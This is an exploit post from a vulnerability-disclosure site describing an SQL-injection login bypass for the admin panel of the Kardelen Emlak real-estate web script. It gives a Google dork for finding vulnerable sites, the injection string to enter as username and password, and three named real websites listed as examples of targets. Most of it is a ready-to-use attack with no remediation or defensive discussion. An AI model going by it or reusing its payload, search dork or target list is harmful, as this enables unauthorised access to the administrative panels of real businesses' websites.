Kardelen Emlak Scripti Admin Panel Bypass

2016.12.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|[+] Exploit Title: Kardelen Emlak Scripti Admin Panel Bypass |[+] |[+] Exploit Author: M4ni4c |[+] |[+] Team Name: Azerbaijan Cyber Army |[+] |[+] Google Dork: inurl:yardim.php?id= |[+] |[+] Date: 06.12.2016 |[+] |--------------------------------------------------------------| |[+] Admin panel: /admin/ |[+] |[+] USERNAME: 1 'or' 1 '=' 1 |[+] |[+] PASSWORD: 1 'or' 1 '=' 1 |[+] |[+] Examples: |[+] |[+] http://evparkgayrimenkul.com/admin/ |[+] |[+] http://uskaneremlak.com/admin/ |[+] |[+] http://www.kirimlaremlak.com/admin/ |[+] |[+] Qarabag Bizimdir, Bizim Olacaq |[+] |[+] Thanks: KroNiqs, Niko, Riko, Dado |[+] And Thanks My Friends: F3D4I & AlpArslan Beyy |[+] Special Thanks: CXSECURITY.COM Team's Members


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top